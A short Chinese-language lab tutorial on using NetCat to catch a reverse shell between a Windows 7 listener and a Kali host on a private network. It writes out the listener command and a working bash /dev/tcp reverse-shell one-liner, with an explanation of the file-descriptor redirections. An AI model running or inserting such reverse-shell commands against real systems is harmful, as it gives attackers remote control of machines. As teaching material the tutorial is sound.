NC(NetCat)号称安全界的瑞士军刀,程序小巧,但是功能巨多且好用,今天利用NC实现反弹shell一例。
实验环境:
主机A:WIN7 安装了NC IP:192.168.1.103
主机B:kali 未安装NC IP:192.1668.1.106
目的:在主机A上启用NC,与未安装NC的主机B之间通信,在A上实现B的shell反弹。
步骤很简单:
1、首先在A上启动NC,实现侦听服务:
nc64.exe -lvp 4455
-l 侦听
-v 带显示
-p 端口
即在主机A 192.168.1.103 4455端口上开启侦听服务。
2、在B上利用bash进行反弹:
bash -i >& /dev/tcp/192.168.1.103/4455 0>&1
bash -i >& /dev/tcp/ip/port 0>&1
在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ,如果在其后加文件描述符,是将bash -i 交互模式传递给文件描述符,而如果其后是文件,则将bash -i 交互模式传递给文件。/dev/tcp/ip/port表示传递给远程主机的IP地址对应的端口。
文件描述符: 0 标准输入、1标准输出、2、错误输入输出
命令中的 0>&1 表示将标准输入重定向到标准输出,实现远程的输入可以在远程输出对应内容。
3、主机A上的结果
反弹成功。